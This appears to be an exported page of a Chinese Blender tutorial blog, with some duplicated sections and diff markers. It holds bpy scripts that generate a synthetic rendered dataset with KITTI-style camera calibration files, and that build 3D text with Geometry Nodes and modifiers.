        calId = f'{kittiCalibsPath}{i}.txt'  # write the calibration
        with open(calId, 'w', encoding='utf-8') as fc:
            for p in K:
                fc.writelines(p)
    #clearAll()

if __name__ == '__main__':
    main()
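As for the unimplemented labelIt(i), a minimal hypothetical sketch (not part of the original script) could project each object's bounding box into the image with bpy_extras and write one "name x_min y_min x_max y_max" line per object, reusing img_w, img_h and labelPath from the Config above:

import bpy
import mathutils
from bpy_extras.object_utils import world_to_camera_view

def labelIt(idNum):
    scene = bpy.context.scene
    cam = bpy.data.objects['Camera']
    lines = []
    for obj in bpy.context.collection.objects:
        if obj.name == 'Camera':
            continue
        xs, ys = [], []
        for corner in obj.bound_box:  # the 8 bounding-box corners in object space
            world_co = obj.matrix_world @ mathutils.Vector(corner)
            ndc = world_to_camera_view(scene, cam, world_co)  # normalized [0, 1] coords
            xs.append(ndc.x * img_w)
            ys.append((1 - ndc.y) * img_h)  # flip y: Blender's NDC origin is bottom-left
        lines.append(f'{obj.name} {min(xs):.1f} {min(ys):.1f} {max(xs):.1f} {max(ys):.1f}\n')
    with open(f'{labelPath}{idNum}.txt', 'w', encoding='utf-8') as f:
        f.writelines(lines)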

    clearAll()

Delete all objects in the scene:

def clearAll():
    for obj in bpy.data.objects:
        bpy.data.objects.remove(obj)
    for img in bpy.data.images:
        bpy.data.images.remove(img)
    for ma in bpy.data.materials:
        bpy.data.materials.remove(ma)
    for me in bpy.data.meshes:
        bpy.data.meshes.remove(me)
    for ng in bpy.data.node_groups:
        bpy.data.node_groups.remove(ng)
    for cd in bpy.data.cameras:
        bpy.data.cameras.remove(cd)

    loadWorlds()

The worlds are a set of *.hdr files stored in worldPath; load them:

def loadWorlds():
    world = bpy.context.scene.world
    world.use_nodes = True
    enode = bpy.context.scene.world.node_tree.nodes.new('ShaderNodeTexEnvironment')
    worldFiles = os.listdir(worldPath)
    for file in worldFiles:
        bpy.data.images.load(worldPath + file)

    loadObjs()

The objs are a set of *.blend files stored in objsPath; load them:

def loadObjs():
    objsList = os.listdir(objsPath)
    for objName in objsList:
        file_path = os.path.join(objsPath, objName)
        objN = objName.split('.')[0]  # object name without the extension
        objNameList.append(objN)  # record the object name
        # load the .blend file and append the objects it contains to the current scene
        with bpy.data.libraries.load(file_path, link=False) as (data_from, data_to):
            # only keep objects whose names start with the current object name,
            # to avoid pulling unwanted objects into the scene
            data_to.objects = [name for name in data_from.objects if name.startswith(objN)]
    # commented-out code: the idea was to dump the loaded object names to a YAML file,
    # but it was never implemented
    #with open(cocoYaml,'w',encoding='utf-8') as fc:
    #    yaml.dump(objNameList,fc)

    loadCamera()

def loadCamera():
    camera_data = bpy.data.cameras.new(name='Camera')  # create a new camera data block
    camera_data.lens = cameraLens  # set the focal length
    camera_object = bpy.data.objects.new('Camera', camera_data)  # bind the camera data to an object
    camera_object.rotation_euler[0] = math.pi / 2  # point the camera's Z axis at the scene objects (instead of straight up)
    bpy.context.scene.collection.objects.link(camera_object)  # add the camera object to the scene
    for obj in bpy.data.objects:  # iterate over every object in the scene
        if obj.name != 'Camera':  # parent everything else to the camera, so related objects follow when the camera moves
            obj.parent = bpy.data.objects['Camera']

    calibCamera()

def calibCamera():
    # get the camera object named Camera and its data block
    cam = bpy.data.objects['Camera']
    camd = cam.data
    # focal length in millimetres
    f_in_mm = camd.lens
    # scene parameters: resolution_x_in_px / resolution_y_in_px are the image
    # width/height in pixels, and scale is the render scale
    scene = bpy.context.scene
    resolution_x_in_px = scene.render.resolution_x
    resolution_y_in_px = scene.render.resolution_y
    scale = scene.render.resolution_percentage / 100
    # sensor width and height in millimetres, plus the pixel aspect ratio
    sensor_width_in_mm = camd.sensor_width
    sensor_height_in_mm = camd.sensor_height
    pixel_aspect_ratio = scene.render.pixel_aspect_x / scene.render.pixel_aspect_y
    # with a vertical sensor fit the sensor height is fixed and the effective width
    # changes with the pixel aspect ratio; otherwise the width is fixed and the height changes
    if (camd.sensor_fit == 'VERTICAL'):
        # the sensor height is fixed,
        # the sensor width is effectively changed with the pixel aspect ratio
        # compute the two scale parameters s_u and s_v from the sensor size and aspect ratio
        s_u = resolution_x_in_px * scale / sensor_width_in_mm / pixel_aspect_ratio
        s_v = resolution_y_in_px * scale / sensor_height_in_mm
    else:  # 'HORIZONTAL' and 'AUTO'
        # the sensor width is fixed (sensor fit is horizontal),
        # the sensor height is effectively changed with the pixel aspect ratio
        pixel_aspect_ratio = scene.render.pixel_aspect_x / scene.render.pixel_aspect_y
        s_u = resolution_x_in_px * scale / sensor_width_in_mm
        s_v = resolution_y_in_px * scale * pixel_aspect_ratio / sensor_height_in_mm

    # Parameters of intrinsic calibration matrix K,
    # stored in alpha_u, alpha_v, u_0, v_0 and skew
    alpha_u = f_in_mm * s_u
    alpha_v = f_in_mm * s_v
    u_0 = resolution_x_in_px * scale / 2
    v_0 = resolution_y_in_px * scale / 2
    skew = 0  # only use rectangular pixels
    # K = Matrix(
    #     ((alpha_u, skew,    u_0),
    #      (0,       alpha_v, v_0),
    #      (0,       0,       1)))
    # assemble the entries of K and the other parameters into KITTI-style calibration
    # lines (only the P2 row is actually populated), stored in the list calList;
    # f-strings make building the strings convenient
    calList = [[f'P0: 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0\n'],
               [f'P1: 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0\n'],
               [f'P2: {alpha_u} {skew} {u_0} 0.0 0.0 {alpha_v} {v_0} 0.0 0.0 0.0 1.0 0.0\n'],
               [f'P3: 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0\n'],
               [f'R0_rect: 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0\n'],
               [f'Tr_velo_to_cam: 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0\n'],
               [f'Tr_imu_to_velo: 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0\n']]
    return calList
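What calibCamera computes is the standard pinhole intrinsic matrix; its entries are simply flattened into the KITTI P2 line:

$$
K = \begin{pmatrix} \alpha_u & s & u_0 \\ 0 & \alpha_v & v_0 \\ 0 & 0 & 1 \end{pmatrix},
\qquad \alpha_u = f \cdot s_u,\quad \alpha_v = f \cdot s_v,\quad
u_0 = \frac{w}{2},\quad v_0 = \frac{h}{2},\quad s = 0,
$$

where $f$ is the focal length in mm, $s_u, s_v$ are the pixel densities derived from the sensor size, and $w, h$ are the render resolution.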

    changeTheWorld()

def changeTheWorld():
    while True:
        # pick a random hdr texture
        wd = random.choice(bpy.data.images)
        if wd.name.endswith('hdr'):
            break
    # set it as the environment texture
    bpy.context.scene.world.node_tree.nodes['Environment Texture'].image = wd

    changeObjs()

def changeObjs():
    # unlink every object except the camera from the active collection
    for obj in bpy.context.collection.objects:
        if obj.name != 'Camera':
            bpy.context.collection.objects.unlink(obj)
    # an empty list for the chosen names
    nameList = []
    # randomly pick objects until objsNum of them (objsNum is defined outside the
    # function) have been linked into the active collection
    while len(nameList) < objsNum:
        obj = random.choice(bpy.data.objects)
        if not (obj.name in nameList) and obj.name != 'Camera':
            bpy.context.collection.objects.link(obj)
            nameList.append(obj.name)

    bougeLe()

def bougeLe():
    # for every object except the camera: select it, then use a while loop to
    # compute a scale factor for its location
    for obj in bpy.data.objects:
        if obj.name != 'Camera':
            obj.select_set(True)
            # the scale computation can occasionally raise and crash the script,
            # so try/except keeps retrying until it succeeds
            while True:
                try:
                    scale = math.sqrt(max(obj.dimensions)) * bpy.data.objects['Camera'].data.lens
                    obj.location = (0, 0, -0.08 * scale)
                    break
                except:
                    continue
            # randomly perturb the object's location, rotation and scale, with
            # parameters controlling the magnitude and randomness of the transform
            bpy.ops.object.randomize_transform(random_seed=random.randint(0, 100), loc=(0.24, 0.1, 0.05), rot=(3, 3, 3), scale=(1, 1, 1))
        else:
            # for the camera, draw a random Z-axis rotation with random.uniform
            # to simulate a scanning motion
            obj.rotation_euler[2] = 4 * random.uniform(-0.7, 0.7)

    snapIt()

def snapIt(scene, idNum):
    for obj in bpy.data.objects:
        if obj.name != 'Camera':
            # deselect everything but the camera
            obj.select_set(False)
    # build the output path and file name from imgPath and idNum
    imId = f'{imgPath}{idNum}.png'
    scene.render.filepath = (imId)
    # render the scene and save the result as a PNG image
    bpy.ops.render.render(write_still=True)
    ]]>
    + 资源

    代码

    Config

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    import bpy
    import math, mathutils
    import os, random
    import json
    import numpy as np

    mode = 'train' # FLAGS : train or val
    worldPath = 'pathToYourBackgrounds/'
    objsPath = 'pathToYour3DObjso/'
    imgPath = f'/home/xxx/Documents/myDataset/images/{mode}/'
    labelPath = f'/home/xxx/Documents/myDataset/labels/{mode}/'
    kittiCalibsPath = '/home/xxx/Documents/myDataset/kittiCalibs/'
    kittiLabelsPath = '/home/xxx/Documents/myDataset/kittiLabels/'

    picsNum = 2000
    # Number of objects in a scene
    objsNum = 4
    if objsNum > len(os.listdir(objsPath)):
    objsNum = len(os.listdir(objsPath))
    cameraLens = 15 # 相机焦距
    img_w = 960
    img_h = 540
    # Worlds changing frequency
    freq_CTW = 10
    objNameList = []

    main()

    1. 函数 clearAll(): 清空场景中所有的对象。
    2. 函数 loadWorlds(): 加载不同的场景环境。
    3. 函数 loadObjs(): 加载需要渲染的物体。
    4. 函数 loadCamera(): 加载摄像机。
    5. scene.camera = scene.objects['Camera']: 将场景中的相机设置为所加载的相机。
    6. scene.render.resolution_xscene.render.resolution_y: 分别设置输出图像的宽度和高度。
    7. 函数 K = calibCamera(): 计算相机内部参数,即相机的内参矩阵。
    8. 函数 changeTheWorld(): 改变场景环境(比如更改场景光照等),使得每张图片看起来不完全一样。
    9. for i in range(picsNum): 循环输出多张图片。
    10. 函数 changeObjs(): 改变场景中的物体位置和姿态,使得每张图片中物体的位置和姿态发生变换。
    11. 函数 bougeLe(): 让场景中的物体随机移动一定距离(模拟物体在真实场景中的运动)。
    12. 函数 snapIt(scene, i): 对场景进行拍照,生成一张渲染后的图像。
    13. calId = f'{kittiCalibsPath}{i}.txt': 生成保存相机内参矩阵的文件名。
    14. with open(calId,'w',encoding='utf-8') as fc:: 打开一个文件进行写入相机内参矩阵。
    15. for p in K: fc.writelines(p): 写入相机内参矩阵。
    16. clearAll(): 清空场景中所有的对象。

    其中,labelIt(i) 这一部分是待实现的标注代码,用于对生成的渲染图像进行标注。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    def main():
    clearAll()
    loadWorlds()
    loadObjs()
    loadCamera()
    scene = bpy.context.scene # 获取当前场景
    scene.camera = scene.objects['Camera'] # 将场景中的相机设置为所加载的相机
    scene.render.resolution_x = img_w # 设置输出图像的宽度
    scene.render.resolution_y = img_h # 设置输出图像的高度
    K = calibCamera() # 计算相机内部参数,即相机的内参矩阵
    changeTheWorld() # 改变场景环境(比如更改场景光照等),使得每张图片看起来不完全一样
    for i in range(picsNum): # 循环输出多张图片
    if i % freq_CTW == 0:
    changeTheWorld()
    changeObjs() # 改变场景中的物体位置和姿态,使得每张图片中物体的位置和姿态发生变换
    bougeLe() # 让场景中的物体随机移动一定距离(模拟物体在真实场景中的运动)
    snapIt(scene, i) # 对场景进行拍照,生成一张渲染后的图像
    labelIt(i) # <- TODO
    calId = f'{kittiCalibsPath}{i}.txt' # 写入参数
    with open(calId,'w',encoding='utf-8') as fc:
    for p in K:
    fc.writelines(p)
    #clearAll()
    if __name__ == '__main__':
    main()

    clearAll()

    删除场景中的所有对象:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    def clearAll():
    for obj in bpy.data.objects:
    bpy.data.objects.remove(obj)
    for img in bpy.data.images:
    bpy.data.images.remove(img)
    for ma in bpy.data.materials:
    bpy.data.materials.remove(ma)
    for me in bpy.data.meshes:
    bpy.data.meshes.remove(me)
    for ng in bpy.data.node_groups:
    bpy.data.node_groups.remove(ng)
    for cd in bpy.data.cameras:
    bpy.data.cameras.remove(cd)

    loadWorlds()

    world 是一系列 *.hdr 文件并存放在 worldPath 中,加载它们:

    1
    2
    3
    4
    5
    6
    7
    def loadWorlds():
    world = bpy.context.scene.world
    world.use_nodes = True
    enode = bpy.context.scene.world.node_tree.nodes.new('ShaderNodeTexEnvironment')
    worldFiles = os.listdir(worldPath)
    for file in worldFiles:
    bpy.data.images.load(worldPath + file)

    loadObjs()

    objs 是一系列 *.blend 文件并存放在 objsPath 中,加载它们:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    def loadObjs():
    objsList = os.listdir(objsPath)
    for objName in objsList:
    file_path = os.path.join(objsPath, objName)
    objN = objName.split('.')[0] # 获取物体名称(去除后缀)
    objNameList.append(objN) # 将物体名称添加到物体名称列表中
    # 加载 .obj 文件并将其中包含的物体(对象)添加到当前场景中
    with bpy.data.libraries.load(file_path,link=False) as (data_from, data_to):
    # 只将以当前物体名称开头的对象添加到当前场景中,避免将不需要的对象添加到场景中
    data_to.objects = [name for name in data_from.objects if name.startswith(objN)]
    # 该部分是注释掉的代码,原本是想将已经加载的物体名称保存到 YAML 文件中,但是最终没有实现。
    #with open(cocoYaml,'w',encoding='utf-8') as fc:
    #yaml.dump(objNameList,fc)

    loadCamera()

    1
    2
    3
    4
    5
    6
    7
    8
    9
    def loadCamera():
    camera_data = bpy.data.cameras.new(name='Camera') # 创建一个新的相机对象
    camera_data.lens = cameraLens # 设置相机的焦距
    camera_object = bpy.data.objects.new('Camera', camera_data) # 绑定相机对象
    camera_object.rotation_euler[0] = math.pi / 2 # 使相机的 Z 轴朝向场景中的物体(而非朝上)
    bpy.context.scene.collection.objects.link(camera_object) # 将相机对象添加到场景中
    for obj in bpy.data.objects: # 循环遍历场景中的所有对象
    if obj.name != 'Camera': # 如果对象名称不是相机,则将其添加为相机的子对象,使得在相机移动时,所有与之相关的对象也会跟着移动
    obj.parent = bpy.data.objects['Camera']

    calibCamera()

def calibCamera():
    # Get the camera object named 'Camera' and its camera data-block
    cam = bpy.data.objects['Camera']
    camd = cam.data
    # Focal length in millimetres
    f_in_mm = camd.lens
    # Scene render settings: resolution_x_in_px and resolution_y_in_px are the image
    # width and height in pixels, and scale is the render resolution percentage
    scene = bpy.context.scene
    resolution_x_in_px = scene.render.resolution_x
    resolution_y_in_px = scene.render.resolution_y
    scale = scene.render.resolution_percentage / 100
    # Sensor width and height in millimetres, and the pixel aspect ratio
    sensor_width_in_mm = camd.sensor_width
    sensor_height_in_mm = camd.sensor_height
    pixel_aspect_ratio = scene.render.pixel_aspect_x / scene.render.pixel_aspect_y
    if camd.sensor_fit == 'VERTICAL':
        # The sensor height is fixed (sensor fit is vertical);
        # the effective sensor width changes with the pixel aspect ratio.
        # Derive the two scale factors s_u and s_v from the sensor size.
        s_u = resolution_x_in_px * scale / sensor_width_in_mm / pixel_aspect_ratio
        s_v = resolution_y_in_px * scale / sensor_height_in_mm
    else:  # 'HORIZONTAL' and 'AUTO'
        # The sensor width is fixed (sensor fit is horizontal);
        # the effective sensor height changes with the pixel aspect ratio.
        s_u = resolution_x_in_px * scale / sensor_width_in_mm
        s_v = resolution_y_in_px * scale * pixel_aspect_ratio / sensor_height_in_mm

    # Parameters of the intrinsic calibration matrix K:
    # alpha_u, alpha_v, u_0, v_0 and skew
    alpha_u = f_in_mm * s_u
    alpha_v = f_in_mm * s_v
    u_0 = resolution_x_in_px * scale / 2
    v_0 = resolution_y_in_px * scale / 2
    skew = 0  # only rectangular pixels are used
    # K = Matrix(
    #     ((alpha_u, skew,    u_0),
    #      (0,       alpha_v, v_0),
    #      (0,       0,       1  )))
    # Pack the entries of K into KITTI-style calibration lines (only the P2 row
    # carries real values); an f-string makes the formatting convenient.
    calList = [['P0: 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0\n'],
               ['P1: 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0\n'],
               [f'P2: {alpha_u} {skew} {u_0} 0.0 0.0 {alpha_v} {v_0} 0.0 0.0 0.0 1.0 0.0\n'],
               ['P3: 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0\n'],
               ['R0_rect: 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0\n'],
               ['Tr_velo_to_cam: 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0\n'],
               ['Tr_imu_to_velo: 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0\n']]
    return calList
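A hypothetical usage sketch, not part of the original script (calibPath and idNum here are assumptions): the returned lines can be written out as a KITTI-style calib file:

calList = calibCamera()
with open(os.path.join(calibPath, f'{idNum:06d}.txt'), 'w', encoding='utf-8') as f:
    for line in calList:
        f.write(line[0])  # each entry is a single-element list holding one text line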

    changeTheWorld()

def changeTheWorld():
    while True:
        # Randomly pick a loaded image until we hit an .hdr map
        wd = random.choice(bpy.data.images)
        if wd.name.endswith('hdr'):
            break
    # Set it as the environment texture
    bpy.context.scene.world.node_tree.nodes['Environment Texture'].image = wd

    changeObjs()

def changeObjs():
    # Unlink every object except the camera named "Camera" from the active collection
    for obj in bpy.context.collection.objects:
        if obj.name != 'Camera':
            bpy.context.collection.objects.unlink(obj)
    nameList = []
    # Randomly pick objects until objsNum of them have been linked into the active
    # collection (objsNum is a variable that must be defined outside this function)
    while len(nameList) < objsNum:
        obj = random.choice(bpy.data.objects)
        if not (obj.name in nameList) and obj.name != 'Camera':
            bpy.context.collection.objects.link(obj)
            nameList.append(obj.name)

    bougeLe()

def bougeLe():
    # For every object except the camera named "Camera": select it, then compute a
    # scale factor to set its position
    for obj in bpy.data.objects:
        if obj.name != 'Camera':
            obj.select_set(True)
            # Computing the scale can occasionally raise an exception and crash the
            # script, so retry inside try/except until it succeeds
            while True:
                try:
                    scale = math.sqrt(max(obj.dimensions)) * bpy.data.objects['Camera'].data.lens
                    obj.location = (0, 0, -0.08 * scale)
                    break
                except Exception:
                    continue
            # Randomly perturb the object's location, rotation and scale; the
            # arguments control the magnitude and randomness of the transform
            bpy.ops.object.randomize_transform(random_seed=random.randint(0, 100), loc=(0.24, 0.1, 0.05), rot=(3, 3, 3), scale=(1, 1, 1))
        else:
            # For the camera itself, randomize the Z rotation with random.uniform
            # to mimic a scanning motion
            obj.rotation_euler[2] = 4 * random.uniform(-0.7, 0.7)

    snapIt()

def snapIt(scene, idNum):
    for obj in bpy.data.objects:
        if obj.name != 'Camera':
            # Deselect everything except the camera
            obj.select_set(False)
    # Build the output file path by joining imgPath and idNum
    imId = f'{imgPath}{idNum}.png'
    scene.render.filepath = imId
    # Render the scene and save the result as a PNG image
    bpy.ops.render.render(write_still=True)
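A hedged sketch of how these functions might be driven together (the original driver loop is not shown; the frame count of 100 is an assumption):

loadWorlds()
loadObjs()
loadCamera()
scene = bpy.context.scene
for idNum in range(100):
    changeTheWorld()  # new random HDR environment
    changeObjs()      # new random subset of objects
    bougeLe()         # randomize poses
    snapIt(scene, idNum)  # render frame idNum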
    ]]>
@@ -6126,7 +6126,7 @@ /posts/Blender-Text%20Effects%20In%20Blender%20(7-12)/ - Resources

Course

    Add Flickering Effect | Flickering Neon Sign | Simple & Easy Method | Blender Eevee (All Versions)

1. Open the render setup from tutorial 6 and select the Camera object:

    png

2. Insert a keyframe:

    png

3. Jump 100 frames ahead and set another keyframe. You can change the object's pose by moving, scaling or rotating it; the changed channels turn yellow. Right-clicking brings up Insert Keyframes; click it and the object's transform is recorded into that keyframe.

    png

4. Set the output folder:

    png

5. Render the images:

    png

6. This outputs 100 frames of images:

    png

7. Blender also has built-in video editing!

    png
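The steps above are all done through the GUI; a rough bpy equivalent (a minimal sketch — the animated object, frame range and output path are assumptions, not from the tutorial):

import bpy

scene = bpy.context.scene
obj = bpy.data.objects['Camera']  # assumed: animate the camera

# Keyframe the transform at frame 1, change it, and keyframe again at frame 100
scene.frame_set(1)
obj.keyframe_insert(data_path="location")
scene.frame_set(100)
obj.location.x += 2.0  # any transform change; the channel turns yellow in the UI
obj.keyframe_insert(data_path="location")

# Render all 100 frames as numbered PNGs
scene.frame_start = 1
scene.frame_end = 100
scene.render.filepath = "//renders/"  # assumed output folder, relative to the .blend file
bpy.ops.render.render(animation=True)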

    [3.x] Create Better & Clean 3D Text Using Geometry Nodes In Blender | Easy Step-by-Step Tutorial

1. Keep adjusting the Geometry of the Cube object that comes with a new project until it looks like this:

    png

import bpy
import os

# Add a cube and grab it as the active object
bpy.ops.mesh.primitive_cube_add()
text_obj = bpy.context.object

# Create the Geometry Nodes network
text_modifier = text_obj.modifiers.new(type='NODES', name="Geometry Nodes")
bpy.ops.node.new_geometry_node_group_assign()
node_tree = text_modifier.node_group

# Delete the Group Input node
node_tree.nodes.remove(node_tree.nodes.get("Group Input"))

# Create the String to Curves node
string_to_curves_node = node_tree.nodes.new(type='GeometryNodeStringToCurves')
string_to_curves_node.location = (-400, 50)

string_to_curves_node.align_x = "CENTER"
string_to_curves_node.align_y = "MIDDLE"
string_to_curves_node.inputs[0].default_value = "Hello,\nWorld!"
string_to_curves_node.inputs[1].default_value = 2.2

string_to_curves_node.font = bpy.data.fonts.load(os.path.abspath(os.path.join(
    os.path.abspath(os.path.dirname(bpy.data.filepath)), './fonts/Neon_Future.ttf')))

# Create the Resample Curve node
resample_curve_node = node_tree.nodes.new(type='GeometryNodeResampleCurve')
resample_curve_node.location = (-150, 50)

resample_curve_node.mode = "EVALUATED"

# Create the Fill Curve node
fill_curve_node = node_tree.nodes.new(type='GeometryNodeFillCurve')
fill_curve_node.location = (50, 50)

# Create the Extrude Mesh node
extrude_mesh_node = node_tree.nodes.new(type='GeometryNodeExtrudeMesh')
extrude_mesh_node.location = (250, 150)

extrude_mesh_node.inputs[3].default_value = 0.4
extrude_mesh_node.inputs[4].default_value = False

# Create the Flip Faces node
flip_faces_node = node_tree.nodes.new(type='GeometryNodeFlipFaces')
flip_faces_node.location = (250, -100)

# Create the Join Geometry node
join_geometry_node = node_tree.nodes.new(type='GeometryNodeJoinGeometry')
join_geometry_node.location = (450, 50)

# Create the Realize Instances node
realize_instances_node = node_tree.nodes.new(type='GeometryNodeRealizeInstances')
realize_instances_node.location = (650, 50)

# Create the Merge by Distance node
merge_by_distance_node = node_tree.nodes.new(type='GeometryNodeMergeByDistance')
merge_by_distance_node.location = (850, 50)

# Get the Group Output node
output_node = node_tree.nodes.get("Group Output")
output_node.location = (1050, 50)

# Wire up the nodes
node_tree.links.new(string_to_curves_node.outputs[0], resample_curve_node.inputs[0])
node_tree.links.new(resample_curve_node.outputs[0], fill_curve_node.inputs[0])
node_tree.links.new(fill_curve_node.outputs[0], extrude_mesh_node.inputs[0])
node_tree.links.new(fill_curve_node.outputs[0], flip_faces_node.inputs[0])
node_tree.links.new(extrude_mesh_node.outputs[0], join_geometry_node.inputs[0])
node_tree.links.new(flip_faces_node.outputs[0], join_geometry_node.inputs[0])
node_tree.links.new(join_geometry_node.outputs[0], realize_instances_node.inputs[0])
node_tree.links.new(realize_instances_node.outputs[0], merge_by_distance_node.inputs[0])
node_tree.links.new(merge_by_distance_node.outputs[0], output_node.inputs[0])
2. Then add a Bevel modifier:

    png

    text_modifier_bevel = text_obj.modifiers.new(name="Bevel", type="BEVEL")
    text_modifier_bevel.width = 0.05
    text_modifier_bevel.segments = 5
    text_modifier_bevel.use_clamp_overlap = False
    text_modifier_bevel.harden_normals = True
3. Then add a Simple Deform modifier:

    png

    text_modifier_simple_deform = text_obj.modifiers.new(name="SimpleDeform", type="SIMPLE_DEFORM")
    text_modifier_simple_deform.deform_method = "BEND"
    text_modifier_simple_deform.angle = - np.pi / 4
    text_modifier_simple_deform.deform_axis = "Z"

Full code:

import bpy
import os
import numpy as np

# Add a cube and grab it as the active object
bpy.ops.mesh.primitive_cube_add()
text_obj = bpy.context.object

# Create the Geometry Nodes network
text_modifier_geometrynodes = text_obj.modifiers.new(type='NODES', name="Geometry Nodes")
bpy.ops.node.new_geometry_node_group_assign()
node_tree = text_modifier_geometrynodes.node_group

# Delete the Group Input node
node_tree.nodes.remove(node_tree.nodes.get("Group Input"))

# Create the String to Curves node
string_to_curves_node = node_tree.nodes.new(type='GeometryNodeStringToCurves')
string_to_curves_node.location = (-400, 50)

string_to_curves_node.align_x = "CENTER"
string_to_curves_node.align_y = "MIDDLE"
string_to_curves_node.inputs[0].default_value = "Hello,\nWorld!"
string_to_curves_node.inputs[1].default_value = 2.2

string_to_curves_node.font = bpy.data.fonts.load(os.path.abspath(os.path.join(
    os.path.abspath(os.path.dirname(bpy.data.filepath)), './fonts/Neon_Future.ttf')))

# Create the Resample Curve node
resample_curve_node = node_tree.nodes.new(type='GeometryNodeResampleCurve')
resample_curve_node.location = (-150, 50)

resample_curve_node.mode = "EVALUATED"

# Create the Fill Curve node
fill_curve_node = node_tree.nodes.new(type='GeometryNodeFillCurve')
fill_curve_node.location = (50, 50)

# Create the Extrude Mesh node
extrude_mesh_node = node_tree.nodes.new(type='GeometryNodeExtrudeMesh')
extrude_mesh_node.location = (250, 150)

extrude_mesh_node.inputs[3].default_value = 0.4
extrude_mesh_node.inputs[4].default_value = False

# Create the Flip Faces node
flip_faces_node = node_tree.nodes.new(type='GeometryNodeFlipFaces')
flip_faces_node.location = (250, -100)

# Create the Join Geometry node
join_geometry_node = node_tree.nodes.new(type='GeometryNodeJoinGeometry')
join_geometry_node.location = (450, 50)

# Create the Realize Instances node
realize_instances_node = node_tree.nodes.new(type='GeometryNodeRealizeInstances')
realize_instances_node.location = (650, 50)

# Create the Merge by Distance node
merge_by_distance_node = node_tree.nodes.new(type='GeometryNodeMergeByDistance')
merge_by_distance_node.location = (850, 50)

# Get the Group Output node
output_node = node_tree.nodes.get("Group Output")
output_node.location = (1050, 50)

# Wire up the nodes
node_tree.links.new(string_to_curves_node.outputs[0], resample_curve_node.inputs[0])
node_tree.links.new(resample_curve_node.outputs[0], fill_curve_node.inputs[0])
node_tree.links.new(fill_curve_node.outputs[0], extrude_mesh_node.inputs[0])
node_tree.links.new(fill_curve_node.outputs[0], flip_faces_node.inputs[0])
node_tree.links.new(extrude_mesh_node.outputs[0], join_geometry_node.inputs[0])
node_tree.links.new(flip_faces_node.outputs[0], join_geometry_node.inputs[0])
node_tree.links.new(join_geometry_node.outputs[0], realize_instances_node.inputs[0])
node_tree.links.new(realize_instances_node.outputs[0], merge_by_distance_node.inputs[0])
node_tree.links.new(merge_by_distance_node.outputs[0], output_node.inputs[0])

text_modifier_bevel = text_obj.modifiers.new(name="Bevel", type="BEVEL")
text_modifier_bevel.width = 0.05
text_modifier_bevel.segments = 5
text_modifier_bevel.use_clamp_overlap = False
text_modifier_bevel.harden_normals = True

text_modifier_simple_deform = text_obj.modifiers.new(name="SimpleDeform", type="SIMPLE_DEFORM")
text_modifier_simple_deform.deform_method = "BEND"
text_modifier_simple_deform.angle = -np.pi / 4
text_modifier_simple_deform.deform_axis = "Z"

    [3.x] Create Multi-line Text Using Geometry Nodes In Blender | Easy Step-by-Step Tutorial

Adjust the previous Geometry Nodes setup so it can display multiple lines of text:

    png

import bpy
import os
import numpy as np

# Add a cube and grab it as the active object
bpy.ops.mesh.primitive_cube_add()
text_obj = bpy.context.object

# Create the Geometry Nodes network
text_modifier_geometrynodes = text_obj.modifiers.new(type='NODES', name="Geometry Nodes")
bpy.ops.node.new_geometry_node_group_assign()
node_tree = text_modifier_geometrynodes.node_group

# Delete the Group Input node
node_tree.nodes.remove(node_tree.nodes.get("Group Input"))

# Create the Special Characters node
special_characters_node = node_tree.nodes.new(type='FunctionNodeInputSpecialCharacters')
special_characters_node.location = (-800, 200)

# Create the String to Curves nodes
string_to_curves_nodes = []
for i in range(2):
    string_to_curves_nodes.append(node_tree.nodes.new(type='GeometryNodeStringToCurves'))
    string_to_curves_nodes[-1].location = (-400, 350 - 400 * i)
    string_to_curves_nodes[-1].align_x = "CENTER"
    string_to_curves_nodes[-1].align_y = "MIDDLE"
    string_to_curves_nodes[-1].inputs[1].default_value = 2.2
string_to_curves_nodes[0].font = bpy.data.fonts.load(os.path.abspath(os.path.join(
    os.path.abspath(os.path.dirname(bpy.data.filepath)), './fonts/Neon_Future.ttf')))
string_to_curves_nodes[1].font = bpy.data.fonts.load(os.path.abspath(os.path.join(
    os.path.abspath(os.path.dirname(bpy.data.filepath)), './fonts/Ourland.otf')))

# Create the Resample Curve node
resample_curve_node = node_tree.nodes.new(type='GeometryNodeResampleCurve')
resample_curve_node.location = (250, 50)

resample_curve_node.mode = "EVALUATED"

# Create the Fill Curve node
fill_curve_node = node_tree.nodes.new(type='GeometryNodeFillCurve')
fill_curve_node.location = (450, 50)

# Create the Extrude Mesh node
extrude_mesh_node = node_tree.nodes.new(type='GeometryNodeExtrudeMesh')
extrude_mesh_node.location = (650, 150)

extrude_mesh_node.inputs[3].default_value = 0.4
extrude_mesh_node.inputs[4].default_value = False

# Create the Flip Faces node
flip_faces_node = node_tree.nodes.new(type='GeometryNodeFlipFaces')
flip_faces_node.location = (650, -100)

# Create the Join Geometry nodes
join_geometry_nodes = []
for i in range(2):
    join_geometry_nodes.append(node_tree.nodes.new(type='GeometryNodeJoinGeometry'))
join_geometry_nodes[0].location = (50, 50)
join_geometry_nodes[1].location = (850, 50)

# Create the Realize Instances node
realize_instances_node = node_tree.nodes.new(type='GeometryNodeRealizeInstances')
